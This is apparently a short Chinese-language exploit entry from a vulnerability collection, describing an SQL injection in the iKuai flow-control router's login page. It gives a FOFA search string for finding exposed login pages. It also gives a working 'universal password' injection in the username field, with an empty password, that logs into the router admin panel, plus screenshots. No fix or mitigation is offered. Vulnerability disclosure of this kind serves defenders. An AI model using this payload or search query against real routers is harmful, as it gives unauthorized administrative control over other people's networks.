# iKuai 流控路由 SQL注入漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

iKuai 流控路由 存在SQL注入漏洞，可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

iKuai 流控路由

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

title="登录爱快流控路由"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr3NMSjbGaG43CMohX%2Fimage.png?alt=media\&token=31d152aa-a019-4a98-ba64-184116a3670c)

使用万能密码登录后台

```
user: "or""=""or""="
pass: 空
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr3Qh6xuq2whaHXFiX%2Fimage.png?alt=media\&token=f4629a1a-d342-4904-8610-2bf5e49ea8a6)